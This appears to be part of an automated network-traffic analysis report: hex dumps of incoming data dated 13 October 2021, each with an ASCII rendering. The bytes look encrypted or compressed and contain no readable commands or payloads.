                                2021-10-13 14:54:49 UTC63INData Raw: 98 6b a6 8c c1 be 67 b9 09 b6 d6 e5 27 4c d5 99 e0 26 19 dd 9f d0 02 12 d1 16 80 9e 0c 9f ad f9 cb f2 69 fb e4 81 45 9e 18 be 8b a2 37 01 16 8e 6d 00 7e ac 31 b2 04 bb 3e 03 d9 08 b5 70 7c ae 2d f3 7b 07 01 07 d9 c1 dc ae 21 5f 46 6c 0d e7 70 66 dd 36 17 c9 b8 25 c4 a0 45 6f 39 a8 29 d1 0a bd 93 7d 49 48 06 97 8f 37 23 84 7d d7 ab 22 e6 67 25 b6 8f 6b b8 8a 79 1b eb b7 43 24 a3 a9 06 09 7a f4 5f f0 55 1d 07 d2 9e db 61 02 02 40 16 49 24 5d cb 47 ad 87 ba d5 9b 79 15 3d 8d 0d fd 10 1a 6b 43 96 47 41 77 02 27 46 9a d0 94 2c 17 96 c6 ae 8d 88 83 7c fb 13 c1 4e 22 3c f1 b7 14 e5 37 47 3d dc 5b 36 02 ee ed e3 59 61 7f 42 b4 e0 74 4a 12 1a 70 2a 5b 12 b6 6c 11 20 bb 81 b8 83 22 26 d3 83 24 33 fa 4b d9 bc 83 9a 18 87 e0 1d 3a 1b 1b ab 2d 62 ad 3b 2e aa ef 40 65
                                Data Ascii: kg'L&iE7m~1>p|-{!_Flpf6%Eo9)}IH7#}"g%kyC$z_Ua@I$]Gy=kCGAw'F,|N"<7G=[6YaBtJp*[l "&$3K:-b;.@e
                                2021-10-13 14:54:49 UTC64INData Raw: d0 66 40 a8 fe f3 c2 0a fa e9 d9 ee 4b ee a8 0c ea 21 d5 9a 07 33 96 63 e8 29 26 89 2d a0 91 1b 65 5f c7 2d 54 1a 2c 4e 73 98 5b a7 12 e3 ee 6d 87 eb df 00 81 53 c2 bd f1 96 29 bf b5 39 ed 3b 38 fb ec 42 57 d5 a9 dd 3d 86 a7 48 6f 5b fd 6b 80 be fb 1c bf e3 ad 7e 0d 2d 13 a7 af 5b 99 24 3c de 8f d5 5e 81 ff 85 c6 a6 98 c6 fb 64 bc c8 b0 74 7d 8b cf a7 d4 ac ef 30 a3 92 37 52 73 44 55 22 20 59 c6 bc 0c 6c 98 43 5a 78 94 08 f1 07 09 a2 94 f6 21 5e 8f 2c 9e 2c 0b d1 1c 4a c2 d5 aa 62 78 1a f0 5f f9 be ca ae 56 8f 11 cf cf ba f4 e7 05 ff 2f ca da c4 7a 69 0e 04 ac 45 e8 fa 42 bb a4 b1 d2 76 c8 c2 2a 5b aa ac 5d ab 62 66 ab 16 37 d9 62 9f 79 f6 7a 17 d2 4a d4 80 89 86 e5 50 ea 5d 9f 8a 7c ea af 5b 2f 9c 73 96 bb a7 db a6 b1 85 36 0d cd 00 bc 56 32 2e 2c e9 d0
                                Data Ascii: f@K!3c)&-e_-T,Ns[mS)9;8BW=Ho[k~-[$<^dt}07RsDU" YlCZx!^,,Jbx_V/ziEBv*[]bf7byzJP]|[/s6V2.,
                                2021-10-13 14:54:49 UTC65INData Raw: 1c d5 e9 b6 a6 71 e9 48 88 2d ab 97 c0 54 4a fc aa ff c2 50 5c 0c 0d 27 a2 73 c5 00 29 6c b1 b6 28 80 26 40 b3 f8 77 f7 24 b7 98 0b 33 53 67 94 cf ef 92 26 a6 b1 ae c1 cf e1 ea 76 31 d5 ea be 34 29 b2 79 23 87 18 3b 9e 3a 43 20 5b e9 b7 94 28 ac 56 ae b0 29 a9 f3 0b b5 01 45 aa 42 11 61 be ea 16 f4 87 19 71 75 c9 9e 5c 63 67 ba 36 62 1f 94 e8 ad fb 53 2f af 8a c6 76 78 87 9d f8 d4 88 ce 33 86 99 3f 2f 62 5a 48 de f9 14 93 64 73 aa e5 b1 f4 eb dc 7a 10 01 73 ed 3a ab cb ec 79 7f 1f b5 c2 0e 95 d1 86 77 7b 87 eb f0 be 87 b4 ad 6d 75 c0 ab 9d 6a c2 bd 9a 5c e5 46 ed 7d 6f bf 06 87 f2 39 be ce d1 cf f9 e6 be dc aa 6e 1e ba 9f f4 45 82 10 19 fe 15 81 f8 4b c0 33 c9 7f 8b 5f 15 5b 43 f2 d6 e2 d0 82 4f 64 d0 6f c7 ea a1 83 19 cb ce 64 14 71 99 d8 e1 e8 07 1d cf
                                Data Ascii: qH-TJP\'s)l(&@w$3Sg&v14)y#;:C [(V)EBaqu\cg6bS/vx3?/bZHdszs:yw{muj\F}o9nEK3_[COdodq
                                2021-10-13 14:54:49 UTC66INData Raw: 12 da 87 e4 d5 63 5f 4c b7 d1 d3 25 35 18 ec 3d 4d 03 84 f7 8a 31 bc 9f 8d 81 b3 04 c5 92 af ae c2 54 fe ab bd 9a 3d 8c e0 8d ba 1b 11 83 eb 73 aa 2e 2f 60 6e 40 6f c6 c6 b8 1c 07 f9 dc bc af 6a 8c fa a2 44 a9 86 d1 6b b8 ef bd e4 6e 56 db 1c db 34 a9 71 e9 00 11 4b 41 a9 2a 08 30 71 85 4c 75 da 39 11 9f 1a 37 d7 cf a3 99 c3 8d 35 ab 8c 99 7f cb f0 ec 52 0f cf 7e 81 d3 2a b2 7f 0a b0 3b 2a b7 8e 43 3c c0 00 a4 9f 38 02 50 5b b7 0d 08 ff 1a a0 2f e1 55 92 10 61 b5 ef 37 17 82 0a 5a 59 86 41 9b 2e 75 a9 25 62 29 96 de 0f 6d 44 3e ba 82 de 47 45 73 9c fe b1 82 de 22 9d a0 06 bf 6f 72 1e cc 74 15 fc 7d 73 be fb 9c 18 48 dc 7a 0b 3f 36 e4 ec b2 5f c2 6d 69 2d f7 c1 09 9f 10 19 50 50 ce fb c8 1a a0 a5 80 54 08 af 88 95 7d 12 21 bf 4b 68 40 fe 73 78 bf 29 80 c3
                                Data Ascii: c_L%5=M1T=s./`n@ojDknV4qKA*0qLu975R~*;*C<8P[/Ua7ZYA.u%b)mD>GEs"ort}sHz?6_mi-PPT}!Kh@sx)
                                2021-10-13 14:54:49 UTC67INData Raw: 38 c3 35 c7 9d a2 ea 73 ad d6 37 27 b3 a4 79 f0 d9 15 cd 45 f5 53 3a 91 39 e1 ea 54 8b 89 3a ff aa 4c 80 9a b3 8c a3 82 61 ac a0 8e 32 d0 48 68 31 52 29 2a ee d1 ec 0e 83 66 ca 85 a3 43 83 fa 60 07 0a ae ae 3d 16 15 d6 e4 34 d6 d2 8f fa a2 8e 7c 45 c3 10 9d ce 3a cd 84 29 68 a3 6d da 6a 69 f2 6f 57 4c e2 9c be 8a ac 34 0f 69 03 72 93 41 5d 11 27 04 6d 2f 9b d9 01 3e a5 fd f9 a1 f3 7a 09 1f 00 40 c1 d5 25 21 4d cb 73 9e 22 fc 76 50 21 01 d8 3f 1b b2 b0 42 7a 05 6a b4 c0 07 8a a2 6b d5 53 0b 99 97 00 0a 97 73 c6 39 22 f3 49 9a 7e 1c 5f 97 a2 61 0d 7d b5 4b 13 82 89 86 03 a4 f4 c5 cb 52 43 01 c4 02 ca 66 1d 19 50 8a 58 23 52 d5 51 31 80 bf ca 86 56 95 3d 8d 17 61 01 1c 6f 6d b5 c7 6d 77 02 bb 4d 9d cf 9a 38 88 af b5 b1 ad a2 79 6b 2d 89 56 58 21 0b a4 a1 88
                                Data Ascii: 85s7'yES:9T:La2Hh1R)*fC`=4|E:)hmjioWL4irA]'m/>z@%!Ms"vP!?BzjkSs9"I~_a}KRCfPX#RQ1V=aommwM8yk-VX!
                                2021-10-13 14:54:49 UTC68INData Raw: cf f5 e4 b8 dd d6 50 6c 98 97 eb 5b 1c 2b 08 ef 00 ba 99 51 4d 1e d0 f2 8d 4c 10 53 41 da ce 4e 71 bb 61 4d c1 65 d6 e4 15 83 31 d5 56 5f 35 59 8e d8 43 f3 34 01 c0 58 e9 6e bb 7b f1 3d c1 75 48 df d3 f9 ad 27 d3 b0 d7 ff 44 90 1d 62 c2 2a 77 81 0f 36 f1 5b f8 3f 3f 92 12 7d 85 18 eb f9 b9 10 45 80 2b 54 4d 7c 4d a6 12 e0 90 db e9 fe d4 13 98 49 d9 a5 17 32 0e 97 82 28 fe 20 39 6a d7 68 5c c4 ab b8 a5 bf a7 42 76 80 8e 0c ab be f1 4e a5 f2 a8 56 57 29 13 a1 c0 e9 98 13 37 ca 71 e3 49 7f fe 81 c3 8e c3 d8 fb 62 d2 61 81 72 77 fe 31 a6 c2 c2 ee 21 b7 c9 0a 57 73 48 37 99 4e ac cd a8 f8 7e 88 bf 73 7e 84 0d d3 49 08 b3 94 88 96 49 9e 23 04 65 65 31 e3 4b a8 cf a8 5d fc 09 26 d4 c9 0c cb af 50 8a e9 df dc 52 e4 82 d4 71 31 de b5 33 08 4b 06 22 a2 25 1a e1 cf
                                Data Ascii: Pl[+QMLSANqaMe1V_5YC4Xn{=uH'Db*w6[??}E+TM|MI2( 9jh\BvNVW)7qIbarw1!WsH7N~s~II#ee1K]&PRq13K"%
                                2021-10-13 14:54:49 UTC70INData Raw: cc b4 db 04 f1 c4 9a 38 71 78 57 98 e8 8b 4e 12 1c c4 bb 58 0d 95 52 1a 32 bc 98 ed 5f a3 26 d9 ec 45 23 fd 5e f6 82 62 8f 1f 9e e0 bc be 1b 1d 83 26 70 aa 22 74 76 6e 40 6f 81 ef b8 1c 07 d9 d0 c3 ab 60 e5 fa 22 40 af 91 ee eb 6d fc ac 86 9c 40 56 11 b4 c9 a9 62 c5 19 1f de 54 be a0 1f b4 75 84 e8 4c 6b 2e 39 29 69 cb dc d0 89 7a 01 8c 35 a0 92 99 53 cf f0 e0 56 a4 da 70 90 76 a8 b6 7f 0d d0 e4 3a 94 92 3d d6 4d 3f ae 97 11 26 45 78 a5 0d 3c fb 1a ac 18 19 dd ad 16 12 48 f8 1f ef ec f7 51 63 d0 b6 4c 59 66 ba 30 5b b7 81 c8 31 c0 d1 3d ba 95 a2 93 0a 77 96 97 23 9a df 28 81 85 78 50 61 5a 44 df ae 00 81 77 76 86 d6 a4 dc 48 a2 85 1b 29 23 e5 2b a5 28 d3 7b 7f 14 dd d1 1d 87 cc 65 f8 7a 87 e0 cb 0e 96 b3 8a 67 51 fc ab 97 77 1c 21 b5 33 e5 45 fe 79 02 ad
                                Data Ascii: 8qxWNXR2_&E#^b&p"tvn@o`"@m@VbTuLk.9)iz5SVpv:=M?&Ex<HQcLYf0[1=w#(xPaZDwvH)#+({ezgQw!3Ey
                                2021-10-13 14:54:49 UTC71INData Raw: 64 c1 e3 36 4d ae f5 59 ab f2 c4 ba 1d 36 e2 36 a3 6b f2 d8 06 c8 43 f4 c2 84 78 e2 de f1 56 81 be 3d b6 33 42 87 9e 61 85 a3 87 ea b6 4f 82 09 0d cd 0d a2 5c 37 2e 30 c2 f0 17 99 89 da 98 42 4a 95 7c d7 01 d8 a6 72 4e 28 39 df f4 20 cd d9 02 e0 27 2a 6c 9f c1 0a 91 d7 ef 9e b9 3f 7f af ef c9 e0 cf ed fe 9b 35 c9 86 af 86 9b 25 06 7f 1a 7c 16 69 bb ef 26 28 b2 2f 98 de 10 bd e3 79 c1 b9 e2 6d 10 0a ef 44 fc d2 a0 37 51 c5 16 96 e4 71 78 41 36 18 c9 a4 cd 59 9d 1a 61 29 af b3 c9 1c a4 17 7c 8a 44 63 81 88 11 4d 9c 22 cc 55 53 e8 69 34 31 09 25 a6 f7 01 04 66 a0 d5 25 e5 9e e4 69 73 e5 c5 70 4d 12 42 d3 61 aa 6f 0c 1f c7 95 78 7c 5b b4 31 38 87 bb 5b 99 19 ca 26 ee 6d 68 10 1b e5 7d 36 c7 41 77 5d a6 34 fd 7b 17 25 9b 94 c9 b1 bc a0 63 71 05 12 71 53 3b ae
                                Data Ascii: d6MY66kCxV=3BaO\7.0BJ|rN(9 '*l?5%|i&(/ymD7QqxA6Ya)|DcM"USi41%f%ispMBaox|[18[&mh}6Aw]4{%cqqS;
                                2021-10-13 14:54:49 UTC72INData Raw: 97 e0 d3 de fb e4 b4 dc d6 f3 6c 98 9b e7 45 b9 47 09 ef 0b b8 97 5e c5 22 bf 7b 8d 5f 13 35 c8 d0 c7 ca d5 94 49 64 df 6c c7 e6 12 94 13 fb d8 e8 21 59 b6 d9 43 f3 1c f9 de 49 ec 69 a2 7b e1 3c c1 54 4a de d3 fb fb ec d2 b0 dd ff 45 95 30 95 ee 2b 71 9d 93 38 9e 70 f8 2b 21 8d 3d dd 93 1b 6f 5a fe e6 47 80 27 51 c7 53 59 a7 13 fe 95 c8 ae 48 d5 13 98 6d 4d af c9 2d 3a bb 9d 26 ff 2a 2c 72 f6 57 56 d0 85 2a 89 87 a1 54 f1 59 8e 0a 80 aa e5 1b 91 51 a8 56 5d 3d 3b 7b c3 e9 9e 32 bb cd 71 d4 49 6b ea 80 eb 2d c3 c2 f1 4a 4f 7a b1 7e 64 94 20 ae d6 7a 76 25 a6 bc 7d db 74 42 3a 91 35 4d d8 80 51 6d 8e b7 4f 30 53 0e d9 5c 1b 2f 95 99 93 5e 9b 32 9e fa a9 c7 e2 41 8a 58 af 4a 2c 36 69 5d 96 0a e3 a1 5d 9b e9 dd d3 55 fe af d5 c7 39 c2 f7 fb 18 41 24 8b ab 56
                                Data Ascii: lEG^"{_5Idl!YCIi{<TJE0+q8p+!=oZG'QSYHmM-:&*,rWV*TYQV]=;{2qIk-JOz~d zv%}tB:5MQmO0S\/^2AXJ,6i]]U9A$V
                                2021-10-13 14:54:49 UTC73INData Raw: 27 78 e4 ca c7 27 99 e0 c0 ea dd 50 a3 5d 90 c0 68 5b 1c 05 f5 24 38 91 82 74 92 2b 9c 38 9e a3 a2 ba c2 8d a7 39 e2 1f 62 bb 11 94 03 b8 1b 3d ba 1b 87 ba bf 6c b7 3b 5d 16 7e 4e 7a f0 09 25 0d 03 ce e7 a3 fc fc f2 dc ad 5b bf 1a ed 7c 6e fd b9 fb 71 4f 40 3b 43 34 a8 62 53 00 39 4a 4f b1 3a 26 3e 69 9b 86 f8 ed 23 20 0f d4 37 dd d0 1f 04 f2 97 2a dd 06 a0 de d0 ef a5 e2 31 d0 6c 89 12 b1 a3 71 16 bc 5f a7 85 96 4c 0b b5 3f a4 9f a5 b1 4f 67 aa 05 51 ff 1a aa ac 8f d7 b2 1a 7e ba 65 0e eb 9c 01 70 e1 da be 64 4d 73 b4 29 7f 1e 71 c8 37 e8 da 2f b4 8c dc 70 60 eb 8d f6 c1 95 c0 6e 0b 9c 19 b1 6f 7a a5 c8 74 13 0f 75 7c ad f4 a2 af c5 dd 7a 1c 3a 2d 33 2e 84 6f e4 79 7f 14 b5 d6 19 8b ee 32 48 7b 8d 37 1f 09 87 b4 b6 41 07 94 af 97 7b 7b b7 b0 5c e3 51 00
                                Data Ascii: 'x'P]h[$8t+89b=l;]~Nz%[|nqO@;C4bS9JO:&>i# 7*1lq_L?OgQ~epdMs)q7/p`noztu|z:-3.oy2H{7A{{\Q
                                2021-10-13 14:54:49 UTC75INData Raw: a4 40 d2 65 d2 73 30 4d 93 84 e3 ab 64 ce b1 13 3c d9 85 9b 79 fa d2 00 e0 f3 f8 dd 8b ae 5d f2 fb 4d f5 b4 20 ee a5 50 84 e2 7e 87 b2 85 d8 a8 99 21 21 0a da 21 b7 41 24 37 3f e8 e8 37 2d 73 db b2 2e 4b 84 74 dd 03 dc af 6b bb 11 89 d7 e5 27 c1 c8 8f f4 b6 2a 60 8e d4 6d 94 c2 11 95 86 22 6f be f4 f3 1d 79 fc fb 9c 54 dc 89 35 9f bb 2b 18 03 9e 7d 07 6b 8a b5 23 04 bd 16 21 c8 0f a0 6c 66 c3 b4 ca 4d 18 11 1b 7c 97 da b1 30 3a 0d 7c 0a f2 71 77 50 20 04 fe d7 31 58 b7 55 fd 2a be b5 c1 1e ad 97 64 c3 48 04 2a 88 18 cf 94 6c c7 23 27 f6 f5 1d a0 13 7b ac 84 70 1c 61 b1 d8 2a ab 9e ae ae 7a f4 c9 c7 43 13 0b 54 2e d5 77 0d 0f cc a2 49 23 42 dd 81 24 96 bd cb ae 4d 95 3d 87 25 55 00 1d 7e 29 a3 c7 41 76 11 be 46 9a db a3 9f 8f 87 c7 a6 20 af 7c 7c fa 00 4d
                                Data Ascii: @es0Md<y]M P~!!!A$7?7-s.Ktk'*`m"oyT5+}k#!lfM|0:|qwP 1XU*dH*l#'{pa*zCT.wI#B$M=%U~)AvF ||M
                                2021-10-13 14:54:49 UTC76INData Raw: 4f ed 02 a1 e0 d3 c5 d7 cd b1 ca b3 a4 6d 9e b7 f4 42 81 00 08 ef 01 a9 93 5a d5 35 dc e8 8c 5f 14 44 52 f8 db c2 c6 99 6b 5f f1 6c c7 45 01 92 3b 7f d8 e8 3a 67 94 e1 d4 fb 25 05 de 40 f3 6f 5b 52 ca 32 11 61 59 d6 c0 db d6 00 d2 ba d1 f1 55 8c 18 04 f5 31 89 8a 32 31 4e 6f f9 3f 37 b1 01 7e 93 11 69 51 cd 31 44 89 38 b9 4b 78 57 a4 61 e2 83 dc 8c 84 dc 11 92 4f da b5 c4 27 22 a0 b9 d6 ff 06 22 59 b1 44 5e c4 b2 bf 80 87 ae 5d 6d a0 8f 26 8f 6e d3 0f b9 f0 80 42 57 29 19 ad df fb 95 24 3f d5 7f 2a 49 53 f0 44 e3 8e c3 c0 d3 76 d3 7a bb 78 68 90 3c a6 cb 4d e7 df a7 96 72 86 2f 42 3a 91 09 4d cc a8 f8 02 93 bf 5b 12 81 62 c7 58 0d a8 9e 86 99 52 8f 2f 95 df f4 c6 ce 5e a6 ec 97 4f 26 18 e6 71 b8 0c cb a4 4a db f2 cf d9 44 ea 89 57 c6 30 d7 c1 3a 08 67 04
                                Data Ascii: OmBZ5_DRk_lE;:g%@o[R2aYU121No?7~iQ1D8KxWaO'""YD^]m&nBW)$?*ISDvzxh<Mr/B:M[bXR/^O&qJDW0:g
                                2021-10-13 14:54:49 UTC77INData Raw: 8a 6b f6 4b 31 1f ca c3 0d 27 f3 cd 88 ac 70 78 59 ba c0 f4 4a 01 2a ee 3b 74 0d 93 7a 8b 31 bc 8f 88 a8 89 3d d3 84 af dc fc 78 fc b2 14 8b 18 8e 36 3c 96 19 0c a0 b1 74 b2 da 06 a6 6d 6b 67 c5 f1 bb 67 67 d1 f8 b8 85 42 e1 d1 dd 2e af 97 c2 56 6e fc aa e6 50 43 56 33 db 34 a8 64 cf 11 26 4b 5b 95 bd 37 37 66 7a ef 48 fe 35 32 2f 1d 21 23 d1 af 17 eb 86 35 ad 82 4f d1 e7 f2 cd 7c 0b 3d 72 ed 35 2d b2 7b 21 81 1a 38 e9 f3 52 2b 48 15 a4 9f 39 b3 71 7a a3 0d b8 ff 1a 0f 30 9e c8 bb 1b 4a af f9 18 f2 7d 0b 7c 61 c2 b5 64 d6 74 44 37 5f 3c 92 c3 37 ef 5e c0 bb bf d3 44 09 5c 7f fa a5 f7 df 22 93 a7 35 ac 63 27 22 c8 74 17 b9 64 72 be e2 95 de 48 f4 7a 1a 29 b8 ed 3a b0 51 d8 52 64 1e a1 c7 e1 86 ea 08 50 70 87 ed ce f7 86 98 a5 52 24 c0 ac 8f 83 15 1c b3 77
                                Data Ascii: kK1'pxYJ*;tz1=x6<tmkgggB.VnPCV34d&K[77fzH52/!#5O|=r5-{!8R+H9qz0J}|adtD7_<7^D\"5c'"tdrHz):QRdPpR$w
                                2021-10-13 14:54:49 UTC79INData Raw: a3 ce ae a2 b3 d0 4d 90 d6 30 4b ed df 5b ab 6e ab 81 0d 20 f7 3c f4 3b f1 d8 00 cb 7a c3 d8 8d 80 8c da f9 47 8c cd 71 ef af 5b 8f e2 2b 84 b2 89 f6 8c f1 86 25 0c b3 21 ad 43 2e 52 6d c3 e1 19 8c 18 99 b5 41 54 85 5c 96 15 d0 bf 17 98 2b 15 dc 8a 70 d1 c4 98 d5 32 2a 54 9d d0 2a 8e c0 11 97 95 2c 68 bb f2 e0 75 78 fb ec 73 5b e1 86 b7 87 bd 3d 08 92 13 50 05 76 a9 11 20 1c 45 3f b3 ca 24 a8 54 80 d0 ca 99 7c 18 15 3b 67 d2 d8 cc 4b 49 da 79 20 f8 62 70 52 17 12 d6 83 33 58 b1 4a 70 2d af a3 cb 26 b9 86 6c c2 a7 00 a4 9b 0f d7 84 7a c1 c9 32 cd 7a 25 ab 13 7d a7 6b 60 21 75 8d 46 10 59 8b fd 75 7a f4 c7 cb 70 00 1e b9 7e ca 66 19 33 56 8a 58 30 72 d5 51 19 96 bd ca 8e 59 95 2c 9b 06 4a 1a 1d 73 4a 48 c6 6d 75 1a b0 57 9a d9 75 3b a7 85 d6 ba ad af 64 82
                                Data Ascii: M0K[n <;zGq[+%!C.RmAT\+p2*T*,huxs[=Pv E?$T|;gKIy bpR3XJp-&lz2z%}k`!uFYuzp~f3VX0rQY,JsJHmuWu;d
                                2021-10-13 14:54:49 UTC80INData Raw: e5 aa 14 86 c1 8f 96 e0 d3 53 f9 ea a9 ea 09 7a 6d 98 01 f2 5c 88 1f 71 73 07 b6 89 6f 2e 35 d0 f2 10 59 0a 41 4f 9f 5b c6 d9 8f 5e 43 5d 69 d8 fd 1c d3 a7 da c7 f6 34 64 05 df 5c e6 05 e8 de 49 ec e4 a3 4c c6 23 ba e3 5f c9 e3 ec d6 9c d4 af ff ce c1 81 18 0d 76 2d 68 a8 3e da 9e 70 f9 a3 33 86 31 61 d8 87 63 51 f3 23 02 1c 27 58 6c 4b 54 3b 14 f5 a6 fc 47 eb d5 13 0e 43 ce 87 e9 a9 2b bf b5 b4 f8 35 03 41 01 46 5e c4 31 b4 92 ad 87 94 7c 5e 8e 96 87 a1 da 2f 5e f2 a8 56 cb 2f 0c 8d df ce 04 22 29 e7 6e a1 d4 79 e1 ba df 12 c5 dd d4 42 58 7a b1 74 eb 99 2e 96 dd 1b 72 27 b9 8b 7d ca 75 5d 08 b0 fd 59 cc a8 6e 6b 91 8e 44 17 19 0b c6 6e 12 92 0e 9f 8c 6a af 86 8a d2 0a 5b e4 54 94 e4 31 4a 26 1e 6c 5f 89 3b eb 53 5c 9b ef 52 df 5b cd 98 53 5a 3f d7 e3 e4
                                Data Ascii: Szm\qso.5YAO[^C]i4d\IL#_v-h>p31acQ#'XlKT;GC+5AF^1|^/^V/")nyBXzt.r'}u]YnkDnj[T1J&l_;S\R[SZ?
                                2021-10-13 14:54:49 UTC81INData Raw: 2c 32 d6 89 f8 f5 30 5e 0e c3 b3 06 05 f1 d5 ff d1 58 f9 5f 90 c6 e2 c7 15 1a ec 3a 48 19 87 52 2e 31 bc 94 89 2f 9d 26 d3 82 90 95 fd 54 f4 82 45 8b 1f 92 c3 22 b3 08 10 ab a0 78 b5 2d f9 8b 43 4a 72 e9 01 b3 0f 05 ce f2 af a4 60 f2 d9 b6 ba ae bb c5 6b 7d f7 aa e4 6b 5e 44 e5 da 18 aa 49 ca 29 1d a3 af 41 af 1d 23 41 81 ee 2d fc 2d 39 84 1a 37 cc c6 8f 3e cd 8d 3d b2 64 b0 fc c4 f2 98 d8 20 de 74 80 76 bf b3 7f 01 a8 01 37 94 90 45 d5 4d 13 a6 87 35 a0 49 6e 5d 24 94 fd 0d a6 30 96 c0 53 11 4d b6 d2 1d ce 4e 22 c7 63 da b4 63 cb 65 34 81 69 e4 ea de 36 e8 4c 14 ba 93 d1 7c 3b 72 9c 0d de 9b df 8e 97 8d 06 b8 6d 71 0d c8 7d 04 6d 65 5e bc e9 a8 dc 41 c4 84 1b 05 2c e9 2e f0 5e de 79 76 07 58 d1 33 8d c4 22 79 7b 87 e0 f5 28 9d b9 a7 4c 35 3e aa bb 79 02
                                Data Ascii: ,20^X_:HR.1/&TE"x-CJr`k}k^DI)A#A--97>=d tv7EM5In]$0SMN"cce4i6L|;rmq}me^A,.^yvX3"y{(L5>y
                                2021-10-13 14:54:49 UTC82INData Raw: 1d f2 54 8a 58 8c 42 d7 40 33 e8 2e ca 86 53 83 15 a3 0d 61 0b 0b 5a 7d b5 b9 d2 77 02 b1 41 b5 e1 8b 3a 81 91 f2 b3 86 a7 78 02 68 13 5d 55 33 0b fe a1 88 fe 26 6b 14 e2 e9 25 05 f7 c4 28 6a 72 78 5d 93 d3 f3 39 ae 1a ec 31 57 1c 94 69 9c 27 af 8e 8f b2 cd ef d3 83 b2 31 ef 7f e0 bb 0e 9a 0f f7 29 3c ba 11 08 a0 b6 61 a1 0c 31 88 6f 4a 0a 22 12 b9 16 1c c1 ef 6a bc 70 f2 c2 b1 56 9d 4b b5 c0 6e fc a0 f8 76 46 39 2c d9 34 a2 75 15 02 24 4e 5c 86 49 37 30 71 83 ff 68 93 19 3b 2f 10 1f 60 d4 83 13 ea a5 1b aa 9a bb c6 f8 fb ef 56 9e da 70 90 31 e1 b2 7f 01 a4 09 37 fb ac 50 2b 46 17 1b 9b 39 a6 57 50 8d 25 b8 f5 0c 99 3b 97 f1 6d 14 61 b2 96 d3 e5 83 00 57 72 d6 d1 50 d3 62 b0 1e b2 3a 85 ce 21 c0 68 3e ba 99 c7 5c 00 7e b4 3a da 9b d9 4d 5b 8d 17 a4 67 4b
                                Data Ascii: TXB@3.SaZ}wA:xh]U3&k%(jrx]91Wi'1)<a1oJ"jpVKnvF9,4u$N\I70qh;/`Vp17P+F9WP%;maWrPb:!h>\~:M[gK
                                2021-10-13 14:54:49 UTC83INData Raw: 09 57 ed 1a 78 a3 92 85 75 94 2b 8a db 11 39 e3 67 bb c6 d4 8c 26 1e f4 5e 07 2c 4b ae 5c 9b b0 ee 59 44 f5 87 74 e7 3e e2 c6 c9 09 42 1b fa ab 7a e0 f8 c2 ae ad a7 2d 64 fe d1 27 40 82 fe 45 55 65 e8 b8 27 22 da ba 9c 6e 26 d3 01 c0 63 56 de 93 50 c9 f2 e8 77 80 a2 8f ef af 5d 3e 8d 69 94 a4 9c fc 9c 6e 83 25 0a dc 18 a6 54 da 3c 14 c1 f9 0c 87 77 ca bd 5b ac 87 58 da 14 d3 63 f4 8f 29 15 d7 f6 23 cb d7 97 ff 3d 30 7d 61 d1 2e 85 de 9c b4 95 2c 78 be fc d1 7d 71 fc ea 84 47 33 85 83 8a ab 50 34 72 01 75 07 70 ab 0a d9 05 97 3b 89 c2 13 b9 76 63 c3 b8 fe 82 19 3d 3d 54 d4 cd 3d 0f 49 da 7c 1c d0 59 72 41 2d 01 d2 b4 3a d4 8e 42 70 2c a8 9d fc 0f a2 8c 43 e8 5b 01 82 b1 a1 dc 84 77 fb 2a 2e f2 71 32 b1 1a 62 41 94 4d 07 73 b1 92 c5 b1 8b 86 10 69 fd c3 f0
                                Data Ascii: Wxu+9g&^,K\YDt>Bz-d'@EUe'"n&cVPw]>in%T<w[Xc)#=0}a.,x}qG3P4rup;vc==T=I|YrA-:Bp,C[w*.q2bAMsi
                                2021-10-13 14:54:49 UTC84INData Raw: 9f 9a 73 92 c0 a7 df 3b e2 78 1a 23 37 87 49 9e 45 d3 73 57 5f a4 d0 15 96 c2 12 90 08 c3 e8 d8 03 af f5 a5 45 25 e8 e9 95 7d 1e 28 de d8 e4 47 f8 79 66 a1 18 9e e1 3b 99 ff c4 31 fe d9 ba d1 34 eb 6d 98 9c f9 5c 89 13 07 ef 10 a6 8c 6c 3e 34 fc f8 9d 56 02 8c 43 d9 d8 e4 d5 9c 41 5d ce 70 f8 1e 02 be 31 cd dc f9 26 40 00 c6 03 ea 2a 05 cf 46 f3 52 5b 52 ca 35 f9 ab 59 d6 c2 ec e9 13 dd b0 cc e1 52 ae e6 0c c6 22 4f fd 1d 3f 9e 6f c9 2c 3a 99 04 71 8c 01 9b 4f fa 24 46 91 29 6f 10 54 59 ad 7d 6b 80 dc 80 67 ea 13 92 44 c2 a9 d6 3c 38 b0 b5 39 f1 33 d4 60 d3 70 5c c7 de 8c 8f 87 ad 5b 16 2d b1 08 81 b4 d9 4e bb f2 a2 7e 15 2b 13 ab d8 86 1c 25 36 cc 02 ea 4a 7f f4 ea 80 8c c3 c8 d3 27 d1 7a bb 5c 31 9d 31 ac c9 48 fd 2e a6 ab 64 49 39 bc 3b bc 2b 48 c0 bf
                                Data Ascii: s;x#7IEsW_E%}(Gyf;14m\l>4VCA]p1&@*FR[R5YR"O?o,:qO$F)oTY}kgD<893`p\[-N~+%6J'z\11H.dI9;+H
                                2021-10-13 14:54:49 UTC86INData Raw: 08 c8 1d db 19 56 8e 5e 50 7c d5 51 3b 87 b8 b9 b9 5b 95 37 a5 4c 63 01 17 5c 1f b4 c7 4b 7e 14 2d e0 f2 d9 8a 3a 81 fa 13 b1 ad ac 63 56 e8 1c 5d 4e 2a 3c db 5f 89 d8 39 60 0f 31 38 d8 1a fd dd fa c5 61 77 40 6e c1 d8 65 10 18 97 f2 5c 0d 97 0e 0c 31 bc 9f 9c d8 6b 26 d3 87 36 95 fa 82 e9 7c 92 a0 1f 98 ca 15 fd 19 1b a1 c5 51 aa 24 1c f7 a6 40 65 ea 0c aa 13 0d c0 f7 a3 a6 9e e2 fe b2 46 a8 80 10 f1 45 fc aa f7 1d 88 56 1b df 2b a2 71 c0 11 26 52 4f 8f 58 36 1c 21 86 95 ad fc 2d 3d 27 0b 33 0b 5f a8 15 fc 8f 1d be 9b b1 da c9 8b 20 7e 20 da 76 e5 60 2f b2 75 1a a6 6b 04 96 98 58 03 0d 3d a4 95 30 b6 d7 0b 9c 27 b8 f5 32 eb 32 9e d3 85 52 63 b4 f3 16 f2 15 bd 3f 75 db be 6e ac b1 ba 36 77 21 b7 db 38 e8 57 31 a5 a8 2f 6e 27 7e a4 6e 27 64 20 3d ab 9e 18
                                Data Ascii: V^P|Q;[7Lc\K~-:cV]N*<_9`18aw@ne\1k&6|Q$@eFEV+q&ROX6!-='3_ ~ v`/ukX=0'22Rc?un6w!8W1/n'~n'd =
